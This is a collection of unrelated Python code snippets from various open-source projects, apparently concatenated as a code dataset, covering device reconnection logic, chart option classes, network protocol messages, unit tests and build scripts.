self._zeroconf_manager.set_instance(zeroconf_instance)
self._ptr_alias: (str | None) = None
self._a_name: (str | None) = None
self._connection_state = ReconnectLogicState.DISCONNECTED
self._accept_zeroconf_records: bool = True
self._connected_lock = asyncio.Lock()
self._is_stopped = True
self._zc_listening = False
self._tries = 0
self._connect_task: (asyncio.Task[None] | None) = None
self._connect_timer: (asyncio.TimerHandle | None) = None
self._stop_task: (asyncio.Task[None] | None) = None
async def _on_disconnect(self, expected_disconnect: bool) -> None:
if expected_disconnect:
disconnect_type = 'expected'
wait = EXPECTED_DISCONNECT_COOLDOWN
else:
disconnect_type = 'unexpected'
wait = 0
_LOGGER.info('Processing %s disconnect from ESPHome API for %s', disconnect_type, self._cli.log_name)
async with self._connected_lock:
self._async_set_connection_state_while_locked(ReconnectLogicState.DISCONNECTED)
(await self._on_disconnect_cb(expected_disconnect))
if (not self._is_stopped):
self._schedule_connect(wait)
def _async_set_connection_state_while_locked(self, state: ReconnectLogicState) -> None:
assert self._connected_lock.locked(), 'connected_lock must be locked'
self._async_set_connection_state_without_lock(state)
def _async_set_connection_state_without_lock(self, state: ReconnectLogicState) -> None:
self._connection_state = state
self._accept_zeroconf_records = (state in NOT_YET_CONNECTED_STATES)
def _async_log_connection_error(self, err: Exception) -> None:
is_handled_exception = ((not isinstance(err, UnhandledAPIConnectionError)) and isinstance(err, APIConnectionError))
if (not is_handled_exception):
level = logging.ERROR
elif (self._tries == 0):
level = logging.WARNING
else:
level = logging.DEBUG
_LOGGER.log(level, "Can't connect to ESPHome API for %s: %s (%s)", self._cli.log_name, err, type(err).__name__, exc_info=(not is_handled_exception))
async def _try_connect(self) -> bool:
self._async_set_connection_state_while_locked(ReconnectLogicState.CONNECTING)
start_connect_time = time.perf_counter()
try:
(await self._cli.start_connection(on_stop=self._on_disconnect))
except Exception as err:
(await self._handle_connection_failure(err))
return False
finish_connect_time = time.perf_counter()
connect_time = (finish_connect_time - start_connect_time)
_LOGGER.info('Successfully connected to %s in %0.3fs', self._cli.log_name, connect_time)
self._stop_zc_listen()
self._async_set_connection_state_while_locked(ReconnectLogicState.HANDSHAKING)
try:
(await self._cli.finish_connection(login=True))
except Exception as err:
(await self._handle_connection_failure(err))
return False
self._tries = 0
finish_handshake_time = time.perf_counter()
handshake_time = (finish_handshake_time - finish_connect_time)
_LOGGER.info('Successful handshake with %s in %0.3fs', self._cli.log_name, handshake_time)
self._async_set_connection_state_while_locked(ReconnectLogicState.READY)
(await self._on_connect_cb())
return True
async def _handle_connection_failure(self, err: Exception) -> None:
self._async_set_connection_state_while_locked(ReconnectLogicState.DISCONNECTED)
if (self._on_connect_error_cb is not None):
(await self._on_connect_error_cb(err))
self._async_log_connection_error(err)
if isinstance(err, AUTH_EXCEPTIONS):
self._tries = MAXIMUM_BACKOFF_TRIES
else:
self._tries += 1
def _schedule_connect(self, delay: float) -> None:
if (not delay):
self._call_connect_once()
return
_LOGGER.debug('Scheduling new connect attempt in %.2f seconds', delay)
self._cancel_connect_timer()
self._connect_timer = self.loop.call_at((self.loop.time() + delay), self._call_connect_once)
def _call_connect_once(self) -> None:
if (self._connect_task and (not self._connect_task.done())):
if (self._connection_state != ReconnectLogicState.CONNECTING):
_LOGGER.debug('%s: Not cancelling existing connect task as its already %s!', self._cli.log_name, self._connection_state)
return
_LOGGER.debug('%s: Cancelling existing connect task with state %s, to try again now!', self._cli.log_name, self._connection_state)
self._cancel_connect_task('Scheduling new connect attempt')
self._async_set_connection_state_without_lock(ReconnectLogicState.DISCONNECTED)
self._connect_task = asyncio.create_task(self._connect_once_or_reschedule(), name=f'{self._cli.log_name}: aioesphomeapi connect')
def _cancel_connect_timer(self) -> None:
if self._connect_timer:
self._connect_timer.cancel()
self._connect_timer = None
def _cancel_connect_task(self, msg: str) -> None:
if self._connect_task:
self._connect_task.cancel(msg)
self._connect_task = None
def _cancel_connect(self, msg: str) -> None:
self._cancel_connect_timer()
self._cancel_connect_task(msg)
async def _connect_once_or_reschedule(self) -> None:
_LOGGER.debug('Trying to connect to %s', self._cli.log_name)
async with self._connected_lock:
_LOGGER.debug('Connected lock acquired for %s', self._cli.log_name)
if ((self._connection_state != ReconnectLogicState.DISCONNECTED) or self._is_stopped):
return
if (await self._try_connect()):
return
tries = min(self._tries, 10)
wait_time = int(round(min((1.8 ** tries), 60.0)))
if (tries == 1):
_LOGGER.info('Trying to connect to %s in the background', self._cli.log_name)
_LOGGER.debug('Retrying %s in %.2f seconds', self._cli.log_name, wait_time)
if wait_time:
self._start_zc_listen()
self._schedule_connect(wait_time)
def _remove_stop_task(self, _fut: asyncio.Future[None]) -> None:
self._stop_task = None
def stop_callback(self) -> None:
self._stop_task = asyncio.create_task(self.stop(), name=f'{self._cli.log_name}: aioesphomeapi reconnect_logic stop_callback')
self._stop_task.add_done_callback(self._remove_stop_task)
async def start(self) -> None:
async with self._connected_lock:
self._is_stopped = False
if (self._connection_state != ReconnectLogicState.DISCONNECTED):
return
self._tries = 0
self._schedule_connect(0.0)
async def stop(self) -> None:
if (self._connection_state in NOT_YET_CONNECTED_STATES):
self._cancel_connect('Stopping')
async with self._connected_lock:
self._is_stopped = True
self._cancel_connect('Stopping')
self._stop_zc_listen()
self._async_set_connection_state_while_locked(ReconnectLogicState.DISCONNECTED)
(await self._zeroconf_manager.async_close())
def _start_zc_listen(self) -> None:
if ((not self._zc_listening) and self.name):
_LOGGER.debug('Starting zeroconf listener for %s', self.name)
self._ptr_alias = f'{self.name}._esphomelib._tcp.local.'
self._a_name = f'{self.name}.local.'
self._zeroconf_manager.get_async_zeroconf().zeroconf.async_add_listener(self, None)
self._zc_listening = True
def _stop_zc_listen(self) -> None:
if self._zc_listening:
_LOGGER.debug('Removing zeroconf listener for %s', self.name)
self._zeroconf_manager.get_async_zeroconf().zeroconf.async_remove_listener(self)
self._zc_listening = False
def _connect_from_zeroconf(self) -> None:
self._stop_zc_listen()
self._schedule_connect(0.0)
def async_update_records(self, zc: zeroconf.Zeroconf, now: float, records: list[zeroconf.RecordUpdate]) -> None:
if ((not self._accept_zeroconf_records) or self._is_stopped):
return
for record_update in records:
new_record = record_update.new
if (not (((new_record.type == TYPE_PTR) and (new_record.alias == self._ptr_alias)) or ((new_record.type == TYPE_A) and (new_record.name == self._a_name)))):
continue
_LOGGER.debug('%s: Triggering connect because of received mDNS record %s', self._cli.log_name, record_update.new)
self.loop.call_soon(self._connect_from_zeroconf)
self._accept_zeroconf_records = False
return |
class NoScrollZoom(MacroElement):
_name = 'NoScrollZoom'
_template = Template('\n {% macro header(this,kwargs) %}\n {% endmacro %}\n {% macro html(this,kwargs) %}\n {% endmacro %}\n {% macro script(this,kwargs) %}\n {{ this._parent.get_name() }}.scrollWheelZoom.disable();\n {% endmacro %}\n ') |
class VerilatorLPDDR4Tests(unittest.TestCase):
ALLOWED = [('WARN', 'tINIT1 violated: RESET deasserted too fast'), ('WARN', 'tINIT3 violated: CKE set HIGH too fast after RESET being released')]
def check_logs(self, logs):
for match in SimLogger.LOG_PATTERN.finditer(logs):
if (match.group('level') in ['WARN', 'ERROR']):
allowed = any((((lvl == match.group('level')) and (msg in match.group('msg'))) for (lvl, msg) in self.ALLOWED))
self.assertTrue(allowed, msg=match.group(0))
def run_test(self, args, **kwargs):
import pexpect
command = ['python3', simsoc.__file__, *args]
timeout = (12 * 60)
p = pexpect.spawn(' '.join(command), timeout=timeout, **kwargs)
res = p.expect(['Memtest OK', 'Memtest KO'])
self.assertEqual(res, 0, msg="{}\nGot '{}'".format(p.before.decode(), p.after.decode()))
self.check_logs(p.before.decode())
def test_lpddr4_sim_x2rate_no_cache(self):
self.run_test(['--finish-after-memtest', '--log-level', 'warn', '--output-dir', 'build/test_lpddr4_sim_x2rate_no_cache', '--double-rate-phy', '--l2-size', '0', '--no-refresh'])
def test_lpddr4_sim_fast(self):
self.run_test(['--finish-after-memtest', '--log-level', 'warn', '--output-dir', 'build/test_lpddr4_sim_fast', '--disable-delay', '--no-refresh']) |
class OptionSeriesBarSonificationDefaultinstrumentoptionsMappingHighpassFrequency(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def test_output_reference_with_attr_path():
obj = _types.OutputReference(node_id='node1', var='var1', attr_path=['a', 0])
assert (obj.node_id == 'node1')
assert (obj.var == 'var1')
assert (obj.attr_path[0] == 'a')
assert (obj.attr_path[1] == 0)
obj2 = _types.OutputReference.from_flyte_idl(obj.to_flyte_idl())
assert (obj == obj2) |
class OptionPlotoptionsColumnSonificationContexttracksMappingTremoloSpeed(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class queue_stats_request(stats_request):
version = 6
type = 18
stats_type = 5
def __init__(self, xid=None, flags=None, port_no=None, queue_id=None):
if (xid != None):
self.xid = xid
else:
self.xid = None
if (flags != None):
self.flags = flags
else:
self.flags = 0
if (port_no != None):
self.port_no = port_no
else:
self.port_no = 0
if (queue_id != None):
self.queue_id = queue_id
else:
self.queue_id = 0
return
def pack(self):
packed = []
packed.append(struct.pack('!B', self.version))
packed.append(struct.pack('!B', self.type))
packed.append(struct.pack('!H', 0))
packed.append(struct.pack('!L', self.xid))
packed.append(struct.pack('!H', self.stats_type))
packed.append(struct.pack('!H', self.flags))
packed.append(('\x00' * 4))
packed.append(util.pack_port_no(self.port_no))
packed.append(struct.pack('!L', self.queue_id))
length = sum([len(x) for x in packed])
packed[2] = struct.pack('!H', length)
return ''.join(packed)
def unpack(reader):
obj = queue_stats_request()
_version = reader.read('!B')[0]
assert (_version == 6)
_type = reader.read('!B')[0]
assert (_type == 18)
_length = reader.read('!H')[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read('!L')[0]
_stats_type = reader.read('!H')[0]
assert (_stats_type == 5)
obj.flags = reader.read('!H')[0]
reader.skip(4)
obj.port_no = util.unpack_port_no(reader)
obj.queue_id = reader.read('!L')[0]
return obj
def __eq__(self, other):
if (type(self) != type(other)):
return False
if (self.xid != other.xid):
return False
if (self.flags != other.flags):
return False
if (self.port_no != other.port_no):
return False
if (self.queue_id != other.queue_id):
return False
return True
def pretty_print(self, q):
q.text('queue_stats_request {')
with q.group():
with q.indent(2):
q.breakable()
q.text('xid = ')
if (self.xid != None):
q.text(('%#x' % self.xid))
else:
q.text('None')
q.text(',')
q.breakable()
q.text('flags = ')
value_name_map = {1: 'OFPSF_REQ_MORE'}
q.text(util.pretty_flags(self.flags, value_name_map.values()))
q.text(',')
q.breakable()
q.text('port_no = ')
q.text(util.pretty_port(self.port_no))
q.text(',')
q.breakable()
q.text('queue_id = ')
q.text(('%#x' % self.queue_id))
q.breakable()
q.text('}') |
class TestSpotifyPlaylistModify():
def test_playlist_modifications(self, user_client, current_user_id):
playlist = user_client.playlist_create(current_user_id, 'tekore-test', public=False, description='Temporary test playlist for Tekore')
assert (playlist is not None)
track_uris = [to_uri('track', id_) for id_ in track_ids]
try:
user_client.playlist_cover_image_upload(playlist.id, image)
new_name = 'tekore-test-modified'
user_client.playlist_change_details(playlist.id, name=new_name, description='Temporary test playlist for Tekore (modified)')
playlist = user_client.playlist(playlist.id)
assert (playlist.name == new_name)
user_client.playlist_add(playlist.id, track_uris[::(- 1)])
assert_items_equal(user_client, playlist.id, track_uris[::(- 1)])
user_client.playlist_replace(playlist.id, track_uris)
assert_items_equal(user_client, playlist.id, track_uris)
snapshot = user_client.playlist_reorder(playlist.id, range_start=1, insert_before=0)
assert_items_equal(user_client, playlist.id, ([track_uris[1], track_uris[0]] + track_uris[2:]))
user_client.playlist_reorder(playlist.id, range_start=1, insert_before=0, snapshot_id=snapshot)
assert_items_equal(user_client, playlist.id, track_uris)
user_client.playlist_remove(playlist.id, track_uris)
items = user_client.playlist_items(playlist.id)
assert (items.total == 0)
new_tracks = (track_uris + track_uris[::(- 1)])
user_client.playlist_replace(playlist.id, new_tracks)
user_client.playlist_remove_occurrences(playlist.id, [(uri, ix) for (ix, uri) in enumerate(track_uris)])
assert_items_equal(user_client, playlist.id, track_uris[::(- 1)])
new_tracks = (track_uris + track_uris[::(- 1)])
user_client.playlist_replace(playlist.id, new_tracks)
playlist = user_client.playlist(playlist.id)
user_client.playlist_remove_indices(playlist.id, list(range(len(track_uris))), playlist.snapshot_id)
assert_items_equal(user_client, playlist.id, track_uris[::(- 1)])
user_client.playlist_clear(playlist.id)
assert_items_equal(user_client, playlist.id, [])
cover = user_client.playlist_cover_image(playlist.id)
assert (len(cover) > 0)
except Exception:
raise
finally:
user_client.playlist_unfollow(playlist.id) |
def hostloc_checkin_retry(account, retry=3, strage='local', show_secret=False):
while True:
try:
hostloc_checkin(account, strage='local', show_secret=show_secret)
break
except RemoteDisconnected:
logger.debug('')
break
except Exception as e:
logger.exception(e)
if (retry == 0):
logger.debug('')
break
retry -= 1
if (strage == 'tencent'):
n = 10
logger.debug('%s', n)
time.sleep(n)
else:
n = 20
logger.debug('%s', n)
time.sleep(n) |
class OptionSeriesBulletSonificationTracksMappingPitch(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get('y')
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get('c6')
def max(self, text: str):
self._config(text, js_type=False)
def min(self):
return self._config_get('c2')
def min(self, text: str):
self._config(text, js_type=False)
def scale(self):
return self._config_get(None)
def scale(self, value: Any):
self._config(value, js_type=False)
def within(self):
return self._config_get('yAxis')
def within(self, text: str):
self._config(text, js_type=False) |
_ordering
class ForkCriteria(ABC):
BLOCK_NUMBER: Final[int] = 0
TIMESTAMP: Final[int] = 1
UNSCHEDULED: Final[int] = 2
_internal: Tuple[(int, int)]
def __eq__(self, other: object) -> bool:
if isinstance(other, ForkCriteria):
return (self._internal == other._internal)
return NotImplemented
def __lt__(self, other: object) -> bool:
if isinstance(other, ForkCriteria):
return (self._internal < other._internal)
return NotImplemented
def __hash__(self) -> int:
return hash(self._internal)
def check(self, block_number: int, timestamp: int) -> bool:
...
def __repr__(self) -> str:
raise NotImplementedError() |
class _ComposedProperty(object):
def __init__(self, name):
self.name = name
def __get__(self, instance, owner):
return getattr(instance.real, self.name)
def __set__(self, instance, value):
return setattr(instance.real, self.name, value)
def __delete__(self, instance):
return delattr(instance.real, self.name) |
def test_get_font_metrics(fx_asset):
with Image(width=144, height=192, background=Color('#fff')) as img:
with Drawing() as draw:
draw.font = str(fx_asset.joinpath('League_Gothic.otf'))
draw.font_size = 13
nm1 = draw.get_font_metrics(img, 'asdf1234')
nm2 = draw.get_font_metrics(img, 'asdf1234asdf1234')
nm3 = draw.get_font_metrics(img, 'asdf1234\nasdf1234')
assert (nm1.character_width == draw.font_size)
assert (nm1.text_width < nm2.text_width)
assert (nm2.text_width <= nm3.text_width)
assert (nm2.text_height == nm3.text_height)
m1 = draw.get_font_metrics(img, 'asdf1234', True)
m2 = draw.get_font_metrics(img, 'asdf1234asdf1234', True)
m3 = draw.get_font_metrics(img, 'asdf1234\nasdf1234', True)
assert (m1.character_width == draw.font_size)
assert (m1.text_width < m2.text_width)
assert (m2.text_width > m3.text_width)
assert (m2.text_height < m3.text_height) |
class DeleteSubExtension(Extension):
def __init__(self, *args, **kwargs):
self.config = {'smart_delete': [True, 'Treat ~~connected~~words~~ intelligently - Default: True'], 'delete': [True, 'Enable delete - Default: True'], 'subscript': [True, 'Enable subscript - Default: True']}
super().__init__(*args, **kwargs)
def extendMarkdown(self, md):
config = self.getConfigs()
delete = bool(config.get('delete', True))
subscript = bool(config.get('subscript', True))
smart = bool(config.get('smart_delete', True))
md.registerExtension(self)
escape_chars = []
if (delete or subscript):
escape_chars.append('~')
if subscript:
escape_chars.append(' ')
util.escape_chars(md, escape_chars)
tilde = None
md.inlinePatterns.register(SimpleTextInlineProcessor(NOT_TILDE), 'not_tilde', 70)
if (delete and subscript):
tilde = (TildeSmartProcessor('~') if smart else TildeProcessor('~'))
elif delete:
tilde = (TildeSmartDeleteProcessor('~') if smart else TildeDeleteProcessor('~'))
elif subscript:
tilde = TildeSubProcessor('~')
if (tilde is not None):
md.inlinePatterns.register(tilde, 'sub_del', 65) |
def assert_default_errors(errors, include_ingress_errors=True):
default_errors = [['', 'Ambassador could not find core CRD definitions. Please visit for more information. You can continue using Ambassador via Kubernetes annotations, any configuration via CRDs will be ignored...'], ['', 'Ambassador could not find Resolver type CRD definitions. Please visit for more information. You can continue using Ambassador via Kubernetes annotations, any configuration via CRDs will be ignored...'], ['', 'Ambassador could not find the Host CRD definition. Please visit for more information. You can continue using Ambassador via Kubernetes annotations, any configuration via CRDs will be ignored...'], ['', 'Ambassador could not find the LogService CRD definition. Please visit for more information. You can continue using Ambassador via Kubernetes annotations, any configuration via CRDs will be ignored...']]
if include_ingress_errors:
default_errors.append(['', 'Ambassador is not permitted to read Ingress resources. Please visit for more information. You can continue using Ambassador, but Ingress resources will be ignored...'])
number_of_default_errors = len(default_errors)
if (errors[:number_of_default_errors] != default_errors):
assert False, f'''default error table mismatch: got
{errors}'''
for error in errors[number_of_default_errors:]:
assert ('found invalid port' in error[1]), "Could not find 'found invalid port' in the error {}".format(error[1]) |
def jagged_to_dense(jagged: torch.Tensor, offsets_list: List[torch.Tensor], dense_shape: List[int], padding_value: float=0.0) -> torch.Tensor:
assert all(((t.dim() == 1) for t in offsets_list))
offsets_list = [list(t.cpu().numpy()) for t in offsets_list]
_check_offsets(offsets_list)
assert ((len(dense_shape) - len(jagged.shape)) == len(offsets_list))
assert (jagged.shape[1:] == tuple(dense_shape[(1 + len(offsets_list)):]))
for (i, offsets) in enumerate(offsets_list):
dense_dim = dense_shape[(i + 1)]
for j in range(1, len(offsets)):
assert ((offsets[j] - offsets[(j - 1)]) <= dense_dim)
dtype = torch_dtype_to_string(jagged.dtype)
result = get_torch_full_tensor(shape=dense_shape, fill_value=padding_value, dtype=dtype)
total_length = jagged.shape[0]
for jagged_idx in range(total_length):
dense_idx = _jagged_idx_to_dense_idx(jagged_idx=jagged_idx, offsets_list=offsets_list)
result[tuple(dense_idx)] = jagged[jagged_idx]
return result |
def generate_predictable_pipeline_id(application_name, pipeline_name):
seed = (application_name + pipeline_name)
pipeline_uuid = uuid.uuid5(_foremast_uuid_namespace, seed)
LOG.debug("Generating pipeline id '%s' using namespace '%s' and seed '%s'", pipeline_name, _foremast_uuid_namespace, seed)
return pipeline_uuid |
def _apply_dict_type(value, key_type=None, value_type=None):
if ((not key_type) and (not value_type)):
return dict(value)
key_type = (key_type or _identity_function)
value_type = (value_type or _identity_function)
return {key_type(key): value_type(value) for (key, value) in value.items()} |
def firewall_ssh_setting(data, fos):
vdom = data['vdom']
firewall_ssh_setting_data = data['firewall_ssh_setting']
filtered_data = underscore_to_hyphen(filter_firewall_ssh_setting_data(firewall_ssh_setting_data))
return fos.set('firewall.ssh', 'setting', data=filtered_data, vdom=vdom) |
()
_option
_option
_option
_option
_option
_option
def install(edm, runtime, toolkit, environment, editable, source):
parameters = get_parameters(edm, runtime, toolkit, environment)
packages = ' '.join(((dependencies | toolkit_dependencies.get(toolkit, set())) | runtime_dependencies.get(runtime, set())))
commands = ['{edm} environments create {environment} --force --version={runtime}', ('{edm} --config edm.yaml install -y -e {environment} ' + packages)]
commands.extend([('{edm} run -e {environment} -- pip install ' + dep) for dep in pypi_dependencies])
click.echo("Creating environment '{environment}'".format(**parameters))
execute(commands, parameters)
if source:
cmd_fmt = '{edm} plumbing remove-package --environment {environment} --force '
commands = [(cmd_fmt + source_pkg) for source_pkg in source_dependencies]
execute(commands, parameters)
source_pkgs = [github_url_fmt.format(pkg) for pkg in source_dependencies]
commands = ['python -m pip install --force-reinstall {pkg}'.format(pkg=pkg) for pkg in source_pkgs]
commands = [('{edm} run -e {environment} -- ' + command) for command in commands]
execute(commands, parameters)
if editable:
install_cmd = '{edm} run -e {environment} -- python -m pip install --editable . --no-dependencies'
else:
install_cmd = '{edm} run -e {environment} -- python -m pip install . --no-dependencies'
execute([install_cmd], parameters)
click.echo('Done install') |
class Color():
def __call__(self, color_str: str=None) -> str:
if (not CONFIG.settings['console']['show_colors']):
return ''
if (not color_str):
return (BASE + 'm')
try:
if (' ' not in color_str):
return f'{BASE}{COLORS[color_str]}m'
(modifier, color_str) = color_str.split()
return f'{BASE}{MODIFIERS[modifier]}{COLORS[color_str]}m'
except (KeyError, ValueError):
return (BASE + 'm')
def __str__(self):
return (BASE + 'm')
def pretty_dict(self, value: Dict, _indent: int=0) -> str:
text = ''
if (not _indent):
text = '{'
_indent += 4
for (c, k) in enumerate(sorted(value.keys(), key=(lambda k: str(k)))):
if c:
text += ','
s = ("'" if isinstance(k, str) else '')
text += f'''
{(' ' * _indent)}{s}{k}{s}: '''
if isinstance(value[k], dict):
text += ('{' + self.pretty_dict(value[k], _indent))
continue
if isinstance(value[k], (list, tuple, set)):
text += (str(value[k])[0] + self.pretty_sequence(value[k], _indent))
continue
text += self._write(value[k])
_indent -= 4
text += f'''
{(' ' * _indent)}}}'''
return text
def pretty_sequence(self, value: Sequence, _indent: int=0) -> str:
text = ''
brackets = (str(value)[0], str(value)[(- 1)])
if (not _indent):
text += f'{brackets[0]}'
if (value and (not [i for i in value if (not isinstance(i, dict))])):
text += f'''
{(' ' * (_indent + 4))}{{'''
text += f''',
{(' ' * (_indent + 4))}{{'''.join((self.pretty_dict(i, (_indent + 4)) for i in value))
text += f'''
{(' ' * _indent)}{brackets[1]}'''
elif (value and (not [i for i in value if ((not isinstance(i, str)) or (len(i) != 64))])):
text += ', '.join((f'''
{(' ' * (_indent + 4))}{self._write(i)}''' for i in value))
text += f'''
{(' ' * _indent)}{brackets[1]}'''
else:
text += ', '.join((self._write(i) for i in value))
text += brackets[1]
return text
def _write(self, value):
s = ('"' if isinstance(value, str) else '')
return f'{s}{value}{s}'
def format_tb(self, exc: Exception, filename: str=None, start: Optional[int]=None, stop: Optional[int]=None) -> str:
if (isinstance(exc, SyntaxError) and (exc.text is not None)):
return self.format_syntaxerror(exc)
tb = [i.replace('./', '') for i in traceback.format_tb(exc.__traceback__)]
if (filename and (not CONFIG.argv['tb'])):
try:
start = tb.index(next((i for i in tb if (filename in i))))
stop = (tb.index(next((i for i in tb[::(- 1)] if (filename in i)))) + 1)
except Exception:
pass
tb = tb[start:stop]
for i in range(len(tb)):
(info, code) = tb[i].split('\n')[:2]
info = info.replace(base_path, '.')
info_lines = [x.strip(',') for x in info.strip().split(' ')]
if ('site-packages/' in info_lines[1]):
info_lines[1] = ('"' + info_lines[1].split('site-packages/')[1])
tb[i] = f" {self('dark white')}File {self('bright magenta')}{info_lines[1]}{self('dark white')}, line {self('bright blue')}{info_lines[3]}{self('dark white')}, in {self('bright cyan')}{info_lines[5]}{self}"
if code:
tb[i] += f'''
{code}'''
msg = str(exc)
if isinstance(exc, VyperException):
msg = self.highlight(msg)
if (not CONFIG.argv['tb']):
tb.clear()
from brownie.exceptions import CompilerError
if isinstance(exc, CompilerError):
if (exc.compiler == 'solc'):
msg = self.highlight(msg, SolidityLexer())
else:
msg = self.highlight(msg)
if (not CONFIG.argv['tb']):
tb.clear()
tb.append(f"{self('bright red')}{type(exc).__name__}{self}: {msg}")
return '\n'.join(tb)
def format_syntaxerror(self, exc: SyntaxError) -> str:
offset = (((exc.offset + len(exc.text.lstrip())) - len(exc.text)) + 3)
exc.filename = exc.filename.replace(base_path, '.')
return f''' {self('dark white')}File "{self('bright magenta')}{exc.filename}{self('dark white')}", line {self('bright blue')}{exc.lineno}{self('dark white')},
{self} {exc.text.strip()}
{(' ' * offset)}^
{self('bright red')}SyntaxError{self}: {exc.msg}'''
def highlight(self, text, lexer=PythonLexer()):
return pygments.highlight(text, lexer, formatter) |
class TestMultipleListenersCleanup(tests.LimitedTestCase):
def setUp(self):
super().setUp()
debug.hub_prevent_multiple_readers(False)
debug.hub_exceptions(False)
def tearDown(self):
super().tearDown()
debug.hub_prevent_multiple_readers(True)
debug.hub_exceptions(True)
def test_cleanup(self):
(r, w) = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
fcntl.fcntl(r, fcntl.F_SETFL, (fcntl.fcntl(r, fcntl.F_GETFL) | os.O_NONBLOCK))
def readfd(fd):
while True:
try:
return os.read(fd, 1)
except OSError as e:
if (e.errno != errno.EAGAIN):
raise
hubs.trampoline(fd, read=True)
first_listener = eventlet.spawn(readfd, r)
eventlet.sleep()
second_listener = eventlet.spawn(readfd, r)
eventlet.sleep()
hubs.get_hub().schedule_call_global(0, second_listener.throw, eventlet.Timeout(None))
eventlet.sleep()
os.write(w, b'.')
self.assertEqual(first_listener.wait(), b'.') |
def get_next_event(shot: System, *, transition_cache: Optional[TransitionCache]=None, quartic_solver: QuarticSolver=QuarticSolver.HYBRID) -> Event:
event = null_event(time=np.inf)
if (transition_cache is None):
transition_cache = TransitionCache.create(shot)
transition_event = transition_cache.get_next()
if (transition_event.time < event.time):
event = transition_event
ball_ball_event = get_next_ball_ball_collision(shot, solver=quartic_solver)
if (ball_ball_event.time < event.time):
event = ball_ball_event
ball_linear_cushion_event = get_next_ball_linear_cushion_collision(shot)
if (ball_linear_cushion_event.time < event.time):
event = ball_linear_cushion_event
ball_circular_cushion_event = get_next_ball_circular_cushion_event(shot, solver=quartic_solver)
if (ball_circular_cushion_event.time < event.time):
event = ball_circular_cushion_event
ball_pocket_event = get_next_ball_pocket_collision(shot, solver=quartic_solver)
if (ball_pocket_event.time < event.time):
event = ball_pocket_event
return event |
def parse_atom_name(name):
org_name = name
assert (len(name) == 4)
name = name.lower()
use_full_name = (name in FULL_NAME)
if (not use_full_name):
name = name[:2]
stripped = STRIP_RE.sub('', name).lower()
if use_full_name:
stripped = stripped[:2]
try:
mapped = NAME_MAP[stripped]
except KeyError:
assert (stripped in KNOWN_ATOMS), f"Could not parse atom name '{org_name}'"
mapped = stripped
return mapped.capitalize() |
class TreeNodePerformanceTestCase(TransactionTestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_performance(self):
settings.DEBUG = True
message_prefix = f'[treenode] create {Category.__module__}.{Category.__name__} tree: '
with debug_performance(message_prefix=message_prefix):
with no_signals():
for i in range(2000):
Category.objects.create(name=f'{i}', tn_parent=None, tn_priority=0)
Category.update_tree()
settings.DEBUG = False |
def extractWatashiwasugoidesuCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
(suppress_health_check=[HealthCheck.function_scoped_fixture])
.usefixtures('use_tmpdir')
(job_queue_nodes)
def test_that_exclude_host_is_in_the_bsub_resource_request(tmp_path, job_queue_node):
reset_command_queue(tmp_path)
next_command_output('submit', submit_success_output('LSF', 1))
queue_config = QueueConfig(job_script=os.path.abspath('script.sh'), queue_system=QueueSystem.LSF, max_submit=2, queue_options={QueueSystem.LSF: [('EXCLUDE_HOST', 'hostname1, hostname2')]})
driver = Driver.create_driver(queue_config)
job_queue_node.submit(driver)
submitinput = Path('submitinput.txt').read_text(encoding='utf-8')
assert ("hname!='hostname1'" in submitinput)
assert ("hname!='hostname2'" in submitinput) |
def latest_widevine_version(eula=False):
if (eula or cdm_from_repo()):
url = config.WIDEVINE_VERSIONS_URL
versions =
return versions.split()[(- 1)]
from .arm import chromeos_config, select_best_chromeos_image
devices = chromeos_config()
arm_device = select_best_chromeos_image(devices)
if (arm_device is None):
log(4, 'We could not find an ARM device in the Chrome OS recovery.json')
ok_dialog(localize(30004), localize(30005))
return ''
return arm_device.get('version') |
class TestCommandChooser(unittest.TestCase):
def test_helper_methods_correct(self):
def main_generator(dut):
possible_cmds = '_rwap'
expected_read = '01000'
expected_write = '00100'
expected_activate = '00010'
helper_methods = {'write': expected_write, 'read': expected_read, 'activate': expected_activate}
for (method, expected_values) in helper_methods.items():
with self.subTest(method=method):
for (cmd, expected) in zip(possible_cmds, expected_values):
(yield from dut.set_requests(f'{cmd}___'))
(yield)
method_value = (yield getattr(dut.chooser, method)())
self.assertEqual(method_value, int(expected))
with self.subTest(method='accept'):
(yield dut.chooser.want_writes.eq(1))
(yield)
(yield from dut.set_requests('____'))
(yield)
self.assertEqual((yield dut.chooser.accept()), 0)
(yield from dut.set_requests('w___'))
(yield)
self.assertEqual((yield dut.chooser.accept()), 0)
self.assertEqual((yield dut.chooser.cmd.valid), 1)
(yield dut.chooser.cmd.ready.eq(1))
(yield)
self.assertEqual((yield dut.chooser.accept()), 1)
dut = CommandChooserDUT(n_requests=4, bankbits=3, addressbits=13)
run_simulation(dut, main_generator(dut))
def test_selects_next_when_request_not_valid(self):
def main_generator(dut):
(yield dut.chooser.want_cmds.eq(1))
(yield from dut.set_requests('pppp'))
(yield)
def invalidate(i):
(yield dut.requests[i].valid.eq(0))
(yield)
(yield dut.requests[i].valid.eq(1))
